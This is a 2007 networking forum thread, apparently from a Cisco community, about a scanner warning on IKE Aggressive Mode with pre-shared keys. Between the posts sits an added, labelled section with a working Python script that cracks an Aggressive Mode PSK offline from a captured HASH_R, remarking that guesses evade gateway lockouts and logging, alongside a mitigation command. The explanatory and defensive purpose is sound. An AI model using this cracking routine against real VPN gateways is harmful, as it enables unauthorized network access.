07-30-2007 12:25 AM - edited 03-03-2019 06:05 PM
This threat seems to want me to turn off aggressive mode; does anyone know what this means:
THREAT:
IKE is used during Phase 1 and Phase 2 of establishing an IPSec connection. Phase 1 is where the two ISAKMP peers establish a secure, authenticated channel with which to communicate. Every participant in IKE must possess a key which may be either pre-shared (PSK) or a public key. There are inherent risks to configurations that use pre-shared keys which are exaggerated when Aggressive Mode is used.
IMPACT:
Using Aggressive Mode with pre-shared keys is the least secure option. In this particular scenario, it is possible for an attacker to gather all necessary information in order to mount an off-line dictionary (brute force) attack on the pre-shared keys. For more information about this type of attack, visit http://www.ima.umn.edu/~pliam/xauth/.
SOLUTION:
IKE Aggressive mode with pre-shared keys should be avoided where possible. Otherwise a strong pre-shared key should be chosen.
Note that this attack method has been known and discussed within the IETF IPSec Working Group. The risk was considered as acceptable. For more information on this, visit http://www.vpnc.org/ietf-ipsec/99.ipsec/thrd2.html#01451.
07-30-2007 05:40 AM
Andy
IKE is part of IPSec and provides the service of negotiating working keys and Security Associations for IPSec as was referenced in the explanation of the vulnerability. IKE operates in 2 phases and in phase 1 there is an option for Aggressive Mode, which accomplishes the negotiation with fewer exchanges of messages. By default Cisco routers prefer to not use aggressive mode, but will respond to aggressive mode if that is presented by the peer. It is my understanding that the VPN client frequently uses aggressive mode. And I am not aware of any way on the router to turn off support for aggressive mode. My suggestion to you is to review the preshared keys that are used and then to say: "The risk was considered as acceptable"
HTH
Rick
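The offline dictionary attack the scanner text and Rick's reply refer to, as an added example that is not part of the original thread. It models the two RFC 2409 computations that matter for pre-shared-key authentication, SKEYID = prf(PSK, Ni_b | Nr_b) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b). In Aggressive Mode every input to HASH_R other than the PSK is sent in the clear in messages 1 and 2, and HASH_R itself is sent unencrypted, so anyone who captures the exchange (or simply sends message 1 to the gateway with a plausible group ID) can test candidate keys offline. The cookies, nonces, Diffie-Hellman values and payload bodies below are constructed filler, the PSK and wordlist are made up, and HMAC-SHA1 is assumed as the negotiated prf; none of it comes from the routers in the thread.

```python
"""Offline dictionary attack on an IKEv1 Aggressive Mode pre-shared key.

Added example, not code from the original thread. Models RFC 2409:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
The prf is HMAC with the negotiated hash; HMAC-SHA1 is assumed here.
"""
from dataclasses import dataclass
import hashlib
import hmac
from typing import Iterable, Optional


@dataclass(frozen=True)
class AggressiveModeCapture:
    """Values an eavesdropper sees in messages 1 and 2 of Aggressive Mode."""
    cky_i: bytes    # initiator cookie (ISAKMP header, message 1)
    cky_r: bytes    # responder cookie (ISAKMP header, message 2)
    sai_b: bytes    # body of the initiator's SA payload (message 1)
    gxi: bytes      # initiator Diffie-Hellman public value (message 1)
    gxr: bytes      # responder Diffie-Hellman public value (message 2)
    ni: bytes       # initiator nonce (message 1)
    nr: bytes       # responder nonce (message 2)
    idir_b: bytes   # body of the responder's ID payload (message 2)
    hash_r: bytes   # responder's HASH_R, sent in cleartext (message 2)


def prf(key: bytes, data: bytes) -> bytes:
    """RFC 2409 prf: HMAC keyed with the negotiated hash (SHA-1 assumed)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid(psk: bytes, ni: bytes, nr: bytes) -> bytes:
    """SKEYID for pre-shared-key authentication (RFC 2409 section 5.4)."""
    return prf(psk, ni + nr)


def compute_hash_r(psk: bytes, c: AggressiveModeCapture) -> bytes:
    """HASH_R exactly as the responder computes it (RFC 2409 section 5)."""
    return prf(skeyid(psk, c.ni, c.nr),
               c.gxr + c.gxi + c.cky_r + c.cky_i + c.sai_b + c.idir_b)


def simulate_capture(psk: bytes) -> AggressiveModeCapture:
    """Build a constructed Aggressive Mode exchange authenticated with psk.

    Cookies, nonces, DH values and payload bodies are fixed filler bytes
    (constructed for this example); only their role in the hash matters.
    """
    fields = dict(
        cky_i=bytes.fromhex("1122334455667788"),
        cky_r=bytes.fromhex("8877665544332211"),
        sai_b=bytes.fromhex("0000000100000001000000280101000100000020"),
        gxi=b"\x02" * 128,   # stand-in for a 1024-bit group 2 g^xi
        gxr=b"\x03" * 128,   # stand-in for g^xr
        ni=bytes.fromhex("a0" * 20),
        nr=bytes.fromhex("b1" * 20),
        # ID payload body: ID_IPV4_ADDR (1), protocol 0, port 0, 192.0.2.1
        idir_b=bytes([1, 0, 0, 0, 192, 0, 2, 1]),
    )
    partial = AggressiveModeCapture(hash_r=b"", **fields)
    return AggressiveModeCapture(hash_r=compute_hash_r(psk, partial), **fields)


def crack_psk(c: AggressiveModeCapture,
              wordlist: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate PSK whose HASH_R matches the capture.

    Nothing is sent to the gateway: every guess is checked offline
    against the one HASH_R already captured, so lockouts and logging
    on the VPN device never see the attempts.
    """
    for candidate in wordlist:
        if hmac.compare_digest(compute_hash_r(candidate, c), c.hash_r):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed scenario: the gateway uses the weak key "cisco123".
    capture = simulate_capture(b"cisco123")
    guesses = [b"password", b"Cisco", b"vpn", b"cisco123", b"letmein"]
    print("recovered PSK:", crack_psk(capture, guesses))
```

The check is per candidate, not per message to the router, which is why the strength of the PSK is the only real defence once Aggressive Mode is answered: a gateway that rate-limits or logs IKE failures gains nothing. The same computation is what ike-scan's psk-crack automates against a real capture. In Main Mode the hash payloads are sent encrypted under SKEYID_e, so a passive observer has nothing to test guesses against. On IOS releases that support it, `crypto isakmp aggressive-mode disable` blocks Aggressive Mode requests to and from the router; check your release's command reference, since Rick's point that the VPN client relies on Aggressive Mode with group pre-shared keys still applies.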
07-31-2007 02:12 AM
Hi Rick, I don't know why, but only 2 of the 837s (out of about 10) have this vulnerability; the only difference is that they are on SDSL lines and not ADSL lines like the others.